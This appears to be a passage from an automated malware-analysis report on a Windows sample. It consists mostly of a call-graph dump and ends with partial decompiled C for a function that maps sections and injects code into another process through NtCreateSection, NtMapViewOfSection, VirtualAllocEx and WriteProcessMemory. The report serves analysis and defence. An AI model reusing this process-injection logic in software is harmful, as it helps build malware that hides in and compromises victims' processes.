11476 73c64d 11475->11476 11477 73c668 11476->11477 11478 739f6b 2 API calls 11477->11478 11479 73c672 11478->11479 11574 7436d5 11479->11574 11481 73c6bd 11482 738d87 2 API calls 11481->11482 11484 73c6c9 11482->11484 11483 73c687 11483->11481 11485 7436d5 2 API calls 11483->11485 11486 739bd5 11484->11486 11485->11483 11487 739be1 MultiByteToWideChar 11486->11487 11488 739bdc 11486->11488 11489 739bf5 11487->11489 11488->11377 11489->11377 11491 739f6b 2 API calls 11490->11491 11492 73c88b 11491->11492 11493 739f6b 2 API calls 11492->11493 11495 73c89a 11493->11495 11494 73c92a 11503 73cbd7 11494->11503 11495->11494 11496 7436d5 2 API calls 11495->11496 11498 73c8eb 11495->11498 11496->11495 11497 7436d5 2 API calls 11497->11498 11498->11497 11499 73c916 11498->11499 11500 738d87 2 API calls 11499->11500 11501 73c922 11500->11501 11502 738d87 2 API calls 11501->11502 11502->11494 11504 73cbef 11503->11504 11505 73c986 6 API calls 11504->11505 11506 73cbf3 11504->11506 11507 73cc07 11505->11507 11506->11382 11507->11506 11508 738ddf 2 API calls 11507->11508 11508->11506 11510 73ddd3 GetCurrentProcess IsWow64Process 11509->11510 11511 73dde4 11509->11511 11510->11511 11512 73dde7 11511->11512 11513 73ddf1 11512->11513 11514 73ddf6 GetSystemInfo 11512->11514 11513->11387 11514->11387 11516 73e31e 11515->11516 11517 743586 11515->11517 11519 7398d0 11516->11519 11517->11516 11518 7436d5 2 API calls 11517->11518 11518->11517 11579 739858 11519->11579 11522 73db68 11524 73dd4d 11522->11524 11533 738f63 memset 11532->11533 11534 739ff8 _vsnwprintf 11533->11534 11535 73a015 11534->11535 11535->11393 11539 73c986 GetTokenInformation 11536->11539 11540 73c9a8 GetLastError 11539->11540 11541 73c9c5 11539->11541 11540->11541 11542 73c9b3 11540->11542 11541->11453 11541->11454 11548 738dc9 RtlAllocateHeap 11542->11548 11544 73c9bb 11544->11541 11545 73c9c9 GetTokenInformation 11544->11545 11545->11541 11546 73c9de 11545->11546 11547 738ddf 2 API calls 11546->11547 11547->11541 11548->11544 11550 73c950 GetLastError 11549->11550 11552 73c97c 11549->11552 11551 73c95d OpenProcessToken 11550->11551 11550->11552 11551->11552 11552->11458 11552->11460 11555 739abc 11554->11555 11557 739ace 11554->11557 11558 738dc9 RtlAllocateHeap 11555->11558 11557->11465 11558->11557 11560 738f63 memset 11559->11560 11561 73c79a lstrcpynW 11560->11561 11563 739f85 2 API calls 11561->11563 11564 73c7cf GetVolumeInformationW 11563->11564 11565 738d9a 2 API calls 11564->11565 11566 73c804 11565->11566 11567 739fe4 2 API calls 11566->11567 11568 73c825 lstrcatW 11567->11568 11572 73a5e9 11568->11572 11571 73c84b 11571->11475 11573 73a5f1 CharUpperBuffW 11572->11573 11573->11571 11575 7436e5 11574->11575 11576 743718 lstrlenW 11575->11576 11577 743735 _ftol2_sse 11576->11577 11577->11483 11580 739868 11579->11580 11581 7436d5 2 API calls 11580->11581 11584 739883 11581->11584 11582 7398b7 11582->11522 11583 7436d5 2 API calls 11583->11584 11584->11582 11584->11583 11611 73d7e7 11610->11611 11641 738dc9 RtlAllocateHeap 11611->11641 11613 73d81b 11614 73d878 11613->11614 11615 739f85 2 API calls 11613->11615 11616 738d9a 2 API calls 11613->11616 11617 739ab3 RtlAllocateHeap 11613->11617 11614->11403 11618 73b6e3 11614->11618 11615->11613 11616->11613 11617->11613 11619 73b6fc 11618->11619 11642 73b632 11619->11642 11623 738f63 memset 11622->11623 11624 73be26 11623->11624 11625 738f63 memset 11624->11625 11626 73be33 CreateProcessW 11625->11626 11626->11415 11651 73d309 11627->11651 11634 738f63 memset 11635 73da24 GetThreadContext 11634->11635 11636 73da4e NtProtectVirtualMemory 11635->11636 11638 73dace 11635->11638 11637 73da90 NtWriteVirtualMemory 11636->11637 11636->11638 11637->11638 11639 73daad NtProtectVirtualMemory 11637->11639 11698 73d47c 11638->11698 11639->11638 11640->11415 11641->11613 11643 74357b 2 API calls 11642->11643 11644 73b64a 11643->11644 11645 739f6b 2 API calls 11644->11645 11646 73b674 11645->11646 11647 739fa5 2 API calls 11646->11647 11648 73b6d2 11647->11648 11649 738d87 2 API calls 11648->11649 11650 73b6dd 11649->11650 11650->11415 11652 73d337 11651->11652 11653 73d325 11651->11653 11655 739f85 2 API calls 11652->11655 11653->11652 11654 73d464 11653->11654 11654->11638 11677 73d538 11654->11677 11656 73d344 11655->11656 11657 739fe4 2 API calls 11656->11657 11658 73d37d 11657->11658 11659 739f85 2 API calls 11658->11659 11660 73d39c 11659->11660 11703 739c50 11660->11703 11663 738d9a 2 API calls 11664 73d3c4 11663->11664 11665 739c50 2 API calls 11664->11665 11666 73d3e7 LoadLibraryW 11665->11666 11668 73d420 11666->11668 11669 73d412 11666->11669 11671 738ddf 2 API calls 11668->11671 11670 73f08e 3 API calls 11669->11670 11670->11668 11672 73d435 11671->11672 11673 738f63 memset 11672->11673 11674 73d447 11673->11674 11674->11654 11675 738ddf 2 API calls 11674->11675 11676 73d462 11675->11676 11676->11654 11678 73d56b 11677->11678 11679 73d58c NtCreateSection 11678->11679 11685 73d77f 11678->11685 11680 73d5b5 RegisterClassExA 11679->11680 11679->11685 11681 73d645 NtMapViewOfSection 11680->11681 11682 73d609 CreateWindowExA 11680->11682 11681->11685 11690 73d678 NtMapViewOfSection 11681->11690 11682->11681 11683 73d633 DestroyWindow UnregisterClassA 11682->11683 11683->11681 11684 73d7b4 11686 73d7c8 11684->11686 11687 73d7bd NtClose 11684->11687 11685->11684 11689 73d7b0 NtUnmapViewOfSection 11685->11689 11686->11634 11686->11638 11687->11686 11689->11684 11690->11685 11691 73d69c 11690->11691 11692 738e2e RtlAllocateHeap 11691->11692 11693 73d6ac 11692->11693 11693->11685 11694 73d6bb VirtualAllocEx WriteProcessMemory 11693->11694 11695 738ddf 2 API calls 11694->11695 11696 73d702 11695->11696 11697 73d765 lstrlenW 11696->11697 11697->11685 11699 73d485 FreeLibrary 11698->11699 11700 73d493 11698->11700 11699->11700 11701 738ddf 2 API calls 11700->11701 11702 73d4b4 11700->11702 11701->11702 11702->11415 11704 739c62 11703->11704 11709 738dc9 RtlAllocateHeap 11704->11709 11706 739c81 11707 739c9e 11706->11707 11708 739c8d lstrcatW 11706->11708 11707->11663 11708->11706 11709->11706 11799 73a7c6 11710->11799 11713 740cd9 11863 738dc9 RtlAllocateHeap 11713->11863 11715 740ce0 11716 740cea 11715->11716 11864 73b553 11715->11864 11716->11420 11719 740d2e 11719->11420 11724 740ac8 14 API calls 11725 740d2b 11724->11725 11725->11420 11901 73ab83 11726->11901 11729 736319 11730 73b6e3 7 API calls 11729->11730 11731 736336 11730->11731 11732 735c8c 10 API calls 11731->11732 11734 736219 11731->11734 11733 736370 11732->11733 11733->11734 11932 73ab69 11733->11932 11734->11426 11734->11427 11737 736382 lstrcmpiW 11737->11734 11739 73b6e3 7 API calls 11738->11739 11740 735ca5 11739->11740 11741 735cb2 11740->11741 11742 739bfd 2 API calls 11740->11742 11743 735cd5 11742->11743 11936 73b270 11743->11936 11745 738ddf 2 API calls 11747 735d15 11745->11747 11746 735ce5 11748 73b270 2 API calls 11746->11748 11749 735d09 11746->11749 11750 73618c 11747->11750 11748->11749 11749->11745 11751 73ab69 4 API calls 11750->11751 11752 736196 11751->11752 11753 7361a4 lstrcmpiW 11752->11753 11754 73619f 11752->11754 11755 7361d6 11753->11755 11756 7361ba 11753->11756 11754->11432 11757 738ddf 2 API calls 11755->11757 11941 73ac61 11756->11941 11757->11754 11990 738dc9 RtlAllocateHeap 11761->11990 11763 7360eb 11764 73612f 11763->11764 11765 7360fe GetDriveTypeW 11763->11765 11991 732bee 11764->11991 11765->11764 11767 73614b 11768 736169 11767->11768 12010 735315 11767->12010 12063 73b162 11768->12063 11772 73b162 2 API calls 11773 736185 11772->11773 11773->11428 11775 73109a 2 API calls 11774->11775 11776 740ad7 11775->11776 12602 7367db memset 11776->12602 11779 738d9a 2 API calls 11780 740afd 11779->11780 11781 740b76 11780->11781 12614 73aaff 11780->12614 11781->11432 11785 740b28 11785->11781 11786 73109a 2 API calls 11785->11786 11787 740b3a 11786->11787 11788 739fe4 2 API calls 11787->11788 11789 740b49 11788->11789 11790 73b787 2 API calls 11789->11790 11791 740b5c 11790->11791 11792 740b6a 11791->11792 12618 73af67 11791->12618 11794 738ddf 2 API calls 11792->11794 11794->11781 11796 7360d1 11795->11796 12631 7359f4 11796->12631 11838 738dc9 RtlAllocateHeap 11799->11838 11801 73a7f0 11826 7361f3 11801->11826 11839 73c5c6 11801->11839 11804 739f6b 2 API calls 11805 73a830 11804->11805 11806 73a96e 11805->11806 11811 73a85c 11805->11811 11807 73a980 11806->11807 11808 73a9bf 11806->11808 11810 73a96a 11807->11810 11813 739bfd 2 API calls 11807->11813 11809 739bfd 2 API calls 11808->11809 11809->11810 11812 738d87 2 API calls 11810->11812 11811->11810 11849 739bfd 11811->11849 11814 73a9df 11812->11814 11813->11810 11816 738ddf 2 API calls 11814->11816 11830 73aa3a 11814->11830 11817 73aa75 11816->11817 11819 738f63 memset 11817->11819 11819->11830 11820 73a924 11823 739bfd 2 API calls 11820->11823 11821 739f85 2 API calls 11822 73a8c2 11821->11822 11825 739c50 2 API calls 11822->11825 11828 73a94b 11823->11828 11824 738ddf 2 API calls 11824->11826 11827 73a8d4 11825->11827 11826->11419 11826->11420 11826->11713 11829 738d9a 2 API calls 11827->11829 11833 738ddf 2 API calls 11828->11833 11831 73a8e2 11829->11831 11830->11824 11830->11830 11855 739b26 11831->11855 11833->11810 11835 738ddf 2 API calls 11836 73a919 11835->11836 11837 738ddf 2 API calls 11836->11837 11837->11820 11838->11801 11840 73c5df 11839->11840 11841 7436d5 2 API calls 11840->11841 11842 73c5ef 11841->11842 11843 739f6b 2 API calls 11842->11843 11844 73c5fe 11843->11844 11845 73c63a 11844->11845 11847 7436d5 2 API calls 11844->11847 11846 738d87 2 API calls 11845->11846 11848 73a811 11846->11848 11847->11844 11848->11804 11852 739c0f 11849->11852 11851 739c49 11851->11814 11851->11820 11851->11821 11861 738dc9 RtlAllocateHeap 11852->11861 11853 739c2c 11853->11851 11854 739c38 lstrcatA 11853->11854 11854->11853 11856 739b5c 11855->11856 11857 739b2f 11855->11857 11856->11835 11862 738dc9 RtlAllocateHeap 11857->11862 11859 739b41 11859->11856 11860 739b49 MultiByteToWideChar 11859->11860 11860->11856 11861->11853 11862->11859 11863->11715 11865 73b56b 11864->11865 11869 73b564 11864->11869 11866 73b595 11865->11866 11865->11869 11895 738dc9 RtlAllocateHeap 11865->11895 11868 738ddf 2 API calls 11866->11868 11866->11869 11868->11869 11869->11719 11870 740b84 11869->11870 11896 738dc9 RtlAllocateHeap 11870->11896 11872 740cd1 11891 73fb9c 11872->11891 11873 740b97 11873->11872 11874 740c86 11873->11874 11875 73109a 2 API calls 11873->11875 11878 738ddf 2 API calls 11874->11878 11876 740bcd 11875->11876 11877 739f85 2 API calls 11876->11877 11879 740bf1 11877->11879 11878->11872 11880 739c50 2 API calls 11879->11880 11881 740c0f 11880->11881 11882 73b553 3 API calls 11881->11882 11883 740c1c 11882->11883 11884 738d9a 2 API calls 11883->11884 11885 740c28 11884->11885 11886 738d9a 2 API calls 11885->11886 11889 740c31 11886->11889 11887 738ddf 2 API calls 11888 740c7b 11887->11888 11890 738ddf 2 API calls 11888->11890 11889->11887 11890->11874 11892 73fbc0 11891->11892 11897 740485 11892->11897 11894 73fbd2 11894->11724 11895->11866 11896->11873 11899 74049e 11897->11899 11898 7404bf lstrlenW 11900 7404de 11898->11900 11899->11898 11899->11899 11900->11894 11900->11900 11904 73ab93 11901->11904 11909 73acb3 11904->11909 11907 73602f 11907->11729 11908 738ddf 2 API calls 11908->11907 11910 73acd5 11909->11910 11923 73a766 11910->11923 11912 73abac 11912->11907 11912->11908 11913 73acdf 11913->11912 11926 73ceb8 11913->11926 11915 738ddf 2 API calls 11915->11912 11916 73ad13 11917 740485 lstrlenW 11916->11917 11922 73adac 11916->11922 11919 73ad64 11917->11919 11918 73ad87 11920 738ddf 2 API calls 11918->11920 11919->11918 11921 738e2e RtlAllocateHeap 11919->11921 11920->11922 11921->11918 11922->11915 11930 738dc9 RtlAllocateHeap 11923->11930 11925 73a772 11925->11913 11927 73cede 11926->11927 11929 73cee2 11927->11929 11931 738dc9 RtlAllocateHeap 11927->11931 11929->11916 11930->11925 11931->11929 11933 73ab6e 11932->11933 11934 73acb3 4 API calls 11933->11934 11935 73637e 11934->11935 11935->11734 11935->11737 11937 73b27f 11936->11937 11940 73b27a 11936->11940 11938 73b2a1 GetLastError 11937->11938 11939 73b296 GetLastError 11937->11939 11938->11940 11939->11940 11940->11746 11957 73ac6f 11941->11957 11944 73c402 SetFileAttributesW 11945 738f63 memset 11944->11945 11946 73c42f 11945->11946 11947 73c450 11946->11947 11948 7436d5 2 API calls 11946->11948 11947->11755 11949 73c46c 11948->11949 11950 739fe4 2 API calls 11949->11950 11951 73c47d 11950->11951 11952 739c50 2 API calls 11951->11952 11953 73c48e 11952->11953 11953->11947 11978 73c32f 11953->11978 11956 738ddf 2 API calls 11956->11947 11958 73ac7f 11957->11958 11961 73adde 11958->11961 11962 73adfb 11961->11962 11974 7361cb 11961->11974 11963 7436d5 2 API calls 11962->11963 11962->11974 11964 73ae3f 11963->11964 11977 738dc9 RtlAllocateHeap 11964->11977 11966 73ae53 11967 74357b 2 API calls 11966->11967 11966->11974 11968 73ae95 11967->11968 11969 740485 lstrlenW 11968->11969 11970 73aed6 11969->11970 11971 73a766 RtlAllocateHeap 11970->11971 11975 73aee2 11971->11975 11972 73af4c 11973 738ddf 2 API calls 11972->11973 11973->11974 11974->11755 11974->11944 11975->11972 11976 738ddf 2 API calls 11975->11976 11976->11972 11977->11966 11979 73c352 11978->11979 11980 73c35a memset 11979->11980 11989 73c3c9 11979->11989 11981 739f85 2 API calls 11980->11981 11982 73c376 11981->11982 11983 7436d5 2 API calls 11982->11983 11984 73c392 11983->11984 11985 739fe4 2 API calls 11984->11985 11986 73c3a8 11985->11986 11987 738d9a 2 API calls 11986->11987 11988 73c3b1 MoveFileW 11987->11988 11988->11989 11989->11956 11990->11763 11992 731080 2 API calls 11991->11992 11993 732c07 11992->11993 12071 73b330 11993->12071 11996 738d87 2 API calls 11997 732c2a 11996->11997 11998 732c5a 11997->11998 11999 731080 2 API calls 11997->11999 11998->11767 12000 732c38 11999->12000 12081 739124 12000->12081 12003 738d87 2 API calls 12004 732c56 12003->12004 12004->11998 12089 73b12f 12004->12089 12006 732c70 12102 7394d4 12006->12102 12009 738ddf 2 API calls 12009->11998 12187 73f1c7 12010->12187 12013 735582 12013->11768 12014 73c85a 9 API calls 12015 73533a 12014->12015 12016 73b6e3 7 API calls 12015->12016 12017 735346 12016->12017 12200 73b222 12017->12200 12019 735352 12019->12013 12020 73f0d9 8 API calls 12019->12020 12021 735371 12020->12021 12022 739f85 2 API calls 12021->12022 12023 735382 12022->12023 12024 739c50 2 API calls 12023->12024 12025 73539b 12024->12025 12026 738d9a 2 API calls 12025->12026 12028 7353ae 12026->12028 12027 7353c1 12029 738ddf 2 API calls 12027->12029 12028->12027 12205 73b145 12028->12205 12031 7353d6 12029->12031 12211 73503f memset 12031->12211 12034 738f63 memset 12036 73542e 12034->12036 12035 73558b 12037 739f85 2 API calls 12035->12037 12267 73f323 12036->12267 12038 735595 12037->12038 12040 739c50 2 API calls 12038->12040 12064 73b171 12063->12064 12065 73617d 12063->12065 12066 73b196 12064->12066 12068 738ddf 2 API calls 12064->12068 12065->11772 12067 738ddf 2 API calls 12066->12067 12069 73b1a1 12067->12069 12068->12064 12070 738ddf 2 API calls 12069->12070 12070->12065 12072 739b26 2 API calls 12071->12072 12073 73b350 12072->12073 12074 7436d5 2 API calls 12073->12074 12076 73b39d 12073->12076 12075 73b36f FindResourceW 12074->12075 12075->12073 12075->12076 12077 738ddf 2 API calls 12076->12077 12079 73b3a8 12077->12079 12078 732c1a 12078->11996 12079->12078 12080 738e2e RtlAllocateHeap 12079->12080 12080->12078 12082 739133 12081->12082 12088 732c47 12081->12088 12114 738dc9 RtlAllocateHeap 12082->12114 12084 73913d 12084->12088 12115 739029 12084->12115 12087 738ddf 2 API calls 12087->12088 12088->12003 12090 739124 4 API calls 12089->12090 12091 73b074 12090->12091 12092 73b13d 12091->12092 12158 7392a4 12091->12158 12092->12006 12096 73b128 12096->12006 12097 73b120 12098 7394d4 6 API calls 12097->12098 12098->12096 12099 73b08e 12099->12096 12099->12097 12100 738e5d 3 API calls 12099->12100 12164 739a76 12099->12164 12100->12099 12103 7394e3 12102->12103 12113 732c7b 12102->12113 12105 73951d 12103->12105 12106 738ddf 2 API calls 12103->12106 12103->12113 12104 73952d 12108 739548 12104->12108 12109 738ddf 2 API calls 12104->12109 12105->12104 12169 7395fb 12105->12169 12106->12103 12110 73955e 12108->12110 12112 738ddf 2 API calls 12108->12112 12109->12108 12111 738ddf 2 API calls 12110->12111 12111->12113 12112->12110 12113->12009 12114->12084 12129 738dc9 RtlAllocateHeap 12115->12129 12117 73903e 12120 739066 12117->12120 12124 73904b 12117->12124 12130 73957a 12117->12130 12118 7390ea 12122 738ddf 2 API calls 12118->12122 12118->12124 12120->12118 12121 73957a lstrlenW 12120->12121 12123 7390b4 12120->12123 12121->12123 12122->12124 12123->12118 12123->12124 12134 73fd9c 12123->12134 12124->12087 12124->12088 12127 739104 12128 738ddf 2 API calls 12127->12128 12128->12124 12129->12117 12131 73959a 12130->12131 12132 740485 lstrlenW 12131->12132 12133 7395be 12132->12133 12133->12120 12149 738dc9 RtlAllocateHeap 12134->12149 12136 73fdc0 12146 73ff2f 12136->12146 12150 738dc9 RtlAllocateHeap 12136->12150 12137 738ddf 2 API calls 12139 73ff55 12137->12139 12141 738ddf 2 API calls 12139->12141 12140 73fde0 12140->12146 12151 738dc9 RtlAllocateHeap 12140->12151 12142 73ff63 12141->12142 12144 7390e3 12142->12144 12145 738ddf 2 API calls 12142->12145 12144->12118 12144->12127 12145->12144 12146->12137 12147 73fdf4 12147->12146 12152 738e5d 12147->12152 12149->12136 12150->12140 12151->12147 12157 738dc9 RtlAllocateHeap 12152->12157 12154 738e9a 12154->12147 12155 738e72 12155->12154 12156 738ddf 2 API calls 12155->12156 12156->12154 12157->12155 12161 7392c7 12158->12161 12159 738dc9 RtlAllocateHeap 12159->12161 12160 7393fb 12163 738dc9 RtlAllocateHeap 12160->12163 12161->12159 12161->12160 12162 738ddf 2 API calls 12161->12162 12162->12161 12163->12099 12165 739a81 12164->12165 12167 739a97 12164->12167 12168 738dc9 RtlAllocateHeap 12165->12168 12167->12099 12168->12167 12181 738dc9 RtlAllocateHeap 12169->12181 12171 739634 12172 739667 12171->12172 12174 7396e5 12171->12174 12180 73963e 12171->12180 12182 738fb1 12172->12182 12175 740485 lstrlenW 12174->12175 12178 7396dd 12175->12178 12176 739673 12177 740485 lstrlenW 12176->12177 12177->12178 12179 738ddf 2 API calls 12178->12179 12179->12180 12180->12104 12181->12171 12183 7436d5 2 API calls 12182->12183 12184 738fca 12183->12184 12185 738ff7 12184->12185 12186 7436d5 2 API calls 12184->12186 12185->12176 12186->12184 12188 73f1dd 12187->12188 12193 735328 12187->12193 12189 739f6b 2 API calls 12188->12189 12190 73f1e9 12189->12190 12191 739f6b 2 API calls 12190->12191 12192 73f1f8 12191->12192 12192->12193 12194 73f205 GetModuleHandleA 12192->12194 12193->12013 12193->12014 12195 73f212 GetModuleHandleA 12194->12195 12196 73f219 12194->12196 12195->12196 12197 738d87 2 API calls 12196->12197 12198 73f224 12197->12198 12199 738d87 2 API calls 12198->12199 12199->12193 12201 73b236 12200->12201 12202 73b246 GetLastError 12201->12202 12203 73b23c GetLastError 12201->12203 12204 73b253 12202->12204 12203->12204 12204->12019 12280 739183 12205->12280 12207 73b151 12208 73b157 12207->12208 12300 73b074 12207->12300 12208->12027 12212 735075 12211->12212 12213 7350aa 12212->12213 12313 73308a 12212->12313 12215 73c85a 9 API calls 12213->12215 12218 73510f 12213->12218 12216 7350ba 12215->12216 12217 73c64d 6 API calls 12216->12217 12219 7350ca 12217->12219 12218->12034 12218->12035 12329 734ffb 12219->12329 12546 73f233 12267->12546 12310 738dc9 RtlAllocateHeap 12280->12310 12282 7391a4 12283 7391b5 lstrcpynW 12282->12283 12290 7391ae 12282->12290 12284 739228 12283->12284 12285 7391d8 12283->12285 12311 738dc9 RtlAllocateHeap 12284->12311 12287 73b553 3 API calls 12285->12287 12289 7391e4 12287->12289 12288 739233 12288->12290 12291 73924d 12288->12291 12293 738ddf 2 API calls 12288->12293 12289->12291 12292 739029 4 API calls 12289->12292 12290->12207 12295 739275 12291->12295 12297 738ddf 2 API calls 12291->12297 12294 7391fe 12292->12294 12293->12291 12294->12288 12296 739204 12294->12296 12298 738ddf 2 API calls 12295->12298 12297->12295 12298->12290 12301 7392a4 3 API calls 12300->12301 12302 73b087 12301->12302 12312 738dc9 RtlAllocateHeap 12302->12312 12307 73b08e 12310->12282 12311->12288 12312->12307 12314 7330a6 12313->12314 12315 733141 12314->12315 12316 73109a 2 API calls 12314->12316 12315->12213 12317 7330b9 12316->12317 12318 739c50 2 API calls 12317->12318 12624 738dc9 RtlAllocateHeap 12602->12624 12604 736816 12605 736987 12604->12605 12625 738dc9 RtlAllocateHeap 12604->12625 12605->11779 12607 736896 12608 738ddf 2 API calls 12607->12608 12609 736979 12608->12609 12610 738ddf 2 API calls 12609->12610 12610->12605 12611 738f63 memset 12612 736830 12611->12612 12612->12605 12612->12607 12612->12611 12613 73c402 11 API calls 12612->12613 12613->12612 12626 73ab0e 12614->12626 12617 738dc9 RtlAllocateHeap 12617->11785 12619 73af73 12618->12619 12620 73a766 RtlAllocateHeap 12619->12620 12622 73af9b 12620->12622 12621 73b000 12621->11792 12622->12621 12623 738ddf 2 API calls 12622->12623 12623->12621 12624->12604 12625->12612 12627 73acb3 4 API calls 12626->12627 12628 73ab2d 12627->12628 12629 73ab0b 12628->12629 12630 738ddf 2 API calls 12628->12630 12629->11781 12629->12617 12630->12629 12632 73aaff 4 API calls 12631->12632 12633 735a05 12632->12633 12636 735a67 12633->12636 12667 73b423 12633->12667 12636->11431 12637 73abf8 6 API calls 12638 735a2b 12637->12638 12672 73f537 12638->12672 12641 73b6e3 7 API calls 12642 735a49 12641->12642 12642->12636 12679 73a29b 12642->12679 12646 735a7f 12697 731486 CreateMutexW 12646->12697 12648 735a84 12649 73a398 6 API calls 12648->12649 12650 735a92 12649->12650 12712 7334f7 12650->12712 12668 73a1f8 GetSystemTimeAsFileTime 12667->12668 12669 73b42e 12668->12669 12670 73abc9 6 API calls 12669->12670 12671 735a19 12670->12671 12671->12637 12673 73f0d9 8 API calls 12672->12673 12674 73f549 12673->12674 12675 73f0d9 8 API calls 12674->12675 12676 73f562 12675->12676 12776 73f4c6 12676->12776 12678 735a32 12678->12641 12680 73a2ac 12679->12680 12681 735a71 12680->12681 12790 738dc9 RtlAllocateHeap 12680->12790 12683 73a398 12681->12683 12686 73a3b6 12683->12686 12684 73a3ba 12684->12646 12685 73a40e 12688 73a41f 12685->12688 12797 738dc9 RtlAllocateHeap 12685->12797 12686->12684 12686->12685 12791 73a2ee 12686->12791 12688->12684 12689 73b222 2 API calls 12688->12689 12691 73a484 12689->12691 12692 73a4fa SetThreadPriority 12691->12692 12693 73a4bf 12691->12693 12692->12684 12694 73a4e3 12693->12694 12695 738ddf 2 API calls 12693->12695 12696 738f63 memset 12694->12696 12695->12694 12696->12684 12698 73149f CreateMutexW 12697->12698 12708 7314ec 12697->12708 12699 7314b1 12698->12699 12698->12708 12700 731080 2 API calls 12699->12700 12701 7314bb 12700->12701 12702 739a76 RtlAllocateHeap 12701->12702 12701->12708 12703 7314cb 12702->12703 12704 738d87 2 API calls 12703->12704 12705 7314d8 12704->12705 12798 738dc9 RtlAllocateHeap 12705->12798 12707 7314e2 12707->12708 12799 738dc9 RtlAllocateHeap 12707->12799 12708->12648 12710 731503 12710->12708 12800 7374d8 12710->12800 12713 733505 12712->12713 12715 73350a 12712->12715 12804 73cb18 12713->12804 12716 7336a0 12715->12716 12717 73d210 8 API calls 12716->12717 12718 7336bb 12717->12718 12724 7336c4 12718->12724 12811 738dc9 RtlAllocateHeap 12718->12811 12720 7336d8 12722 7336e2 12720->12722 12812 73ce93 12720->12812 12723 738ddf 2 API calls 12722->12723 12723->12724 12729 732e9f 12724->12729 12730 73aaff 4 API calls 12729->12730 12731 732ebd 12730->12731 12825 732de9 12731->12825 12777 73f510 12776->12777 12778 73f4d4 12776->12778 12780 739f6b 2 API calls 12777->12780 12789 738dc9 RtlAllocateHeap 12778->12789 12781 73f51a 12780->12781 12782 739a76 RtlAllocateHeap 12781->12782 12784 73f526 12782->12784 12783 73f4e5 12785 73f533 12783->12785 12787 738ddf 2 API calls 12783->12787 12786 738d87 2 API calls 12784->12786 12785->12678 12786->12785 12788 73f509 12787->12788 12788->12678 12789->12783 12790->12681 12792 73a2f8 12791->12792 12793 73a31d 12792->12793 12794 738ddf 2 API calls 12792->12794 12796 73a333 12792->12796 12795 738f63 memset 12793->12795 12794->12793 12795->12796 12796->12686 12797->12688 12798->12707 12799->12710 12801 7374dd 12800->12801 12805 73cb2f 12804->12805 12806 73cb4e 12805->12806 12807 739f85 2 API calls 12805->12807 12806->12715 12808 73cb5d lstrcmpiW 12807->12808 12809 73cb73 12808->12809 12810 738d9a 2 API calls 12809->12810 12810->12806 12811->12720 12820 73cd08 12812->12820 12821 738f63 memset 12820->12821 12958->11442 12959->11445 13866 732701 13867 73272a 13866->13867 13868 732712 13866->13868 13897 73267d 13867->13897 13874 7370a0 13868->13874 13872 739e22 2 API calls 13873 732743 13872->13873 13875 7370c2 13874->13875 13887 7370ba 13874->13887 13876 73bfc8 2 API calls 13875->13876 13877 7370cb 13876->13877 13877->13887 13904 740e8e 13877->13904 13880 739993 7 API calls 13882 73711b 13880->13882 13881 738ddf 2 API calls 13881->13887 13883 73670a 5 API calls 13882->13883 13882->13887 13884 73712d 13883->13884 13885 73713a 13884->13885 13888 737152 13884->13888 13886 738ddf 2 API calls 13885->13886 13886->13887 13887->13867 13889 737172 13888->13889 13890 735c05 8 API calls 13888->13890 13891 738ddf 2 API calls 13889->13891 13893 73716e 13890->13893 13892 7371a4 13891->13892 13894 738ddf 2 API calls 13892->13894 13893->13889 13895 73abf8 6 API calls 13893->13895 13896 7370e5 13894->13896 13895->13889 13896->13881 13898 73bfc8 2 API calls 13897->13898 13899 73268e 13898->13899 13900 7326b2 13899->13900 13901 7326a5 13899->13901 13915 73adc2 13899->13915 13900->13872 13903 738ddf 2 API calls 13901->13903 13903->13900 13905 740e9d 13904->13905 13906 740ed9 13904->13906 13908 738ddf 2 API calls 13905->13908 13914 738dc9 RtlAllocateHeap 13906->13914 13909 740ea6 13908->13909 13910 738e2e RtlAllocateHeap 13909->13910 13912 7370df 13909->13912 13911 740ebd 13910->13911 13911->13912 13913 73fb9c lstrlenW 13911->13913 13912->13880 13912->13896 13913->13912 13914->13909 13916 73adde 6 API calls 13915->13916 13917 73add9 13916->13917 13917->13901

              Executed Functions

              Function 0073D538 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 223nativeregistrymemoryCOMMON
              Download Yara Rule

              Control-flow Graph

              C-Code - Quality: 95%
              			E0073D538(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				short _v32;
				char _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				long _v48;
				void* _v52;
				void* _v53;
				char _v64;
				short _v68;
				struct _WNDCLASSEXA _v116;
				char _t81;
				intOrPtr* _t83;
				intOrPtr _t87;
				intOrPtr _t90;
				char _t97;
				short _t98;
				intOrPtr _t105;
				long _t107;
				char _t119;
				void* _t124;
				struct HWND__* _t132;
				void* _t138;
				void* _t147;
				void* _t154;
				intOrPtr _t155;
				intOrPtr _t157;
				void* _t158;
				void* _t163;
				void* _t165;

				_t81 =  *0x74f8d4; // 0xc2fc00
				_t138 = 0;
				_v12 = __ecx;
				_t157 = __edx;
				_v20 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v44 = __edx;
				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
					E0073F15B(0x1f4);
				}
				_t12 = _t157 + 0x3c; // 0x852c50ff
				_t83 =  *_t12 + _t157;
				_v28 = _t138;
				_v40 = _t83;
				if( *_t83 != 0x4550) {
					L14:
					_t158 = _v12;
					L15:
					if(_v8 != _t138) {
						_t90 =  *0x74f9d0; // 0xc2fa00
						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
						_v8 = _t138;
					}
					L17:
					if(_v16 != 0) {
						_t87 =  *0x74f8d0; // 0xc2f8c0
						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
					}
					if(_v20 != 0) {
						NtClose(_v20);
					}
					return _v8;
				}
				_v52 =  *((intOrPtr*)(_t83 + 0x50));
				if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
					goto L14;
				}
				_t97 =  *"18293"; // 0x39323831
				_v36 = _t97;
				_t98 =  *0x74ce70; // 0x33
				_v32 = _t98;
				_v116.lpszClassName =  &_v64;
				asm("movsd");
				_v116.lpfnWndProc = DefWindowProcW;
				_v116.cbWndExtra = _t138;
				asm("movsd");
				_v116.style = 0xb;
				_v116.lpszMenuName = _t138;
				_v116.cbSize = 0x30;
				asm("movsb");
				_v116.cbClsExtra = _t138;
				_v116.hInstance = _t138;
				if(RegisterClassExA( &_v116) != 0) {
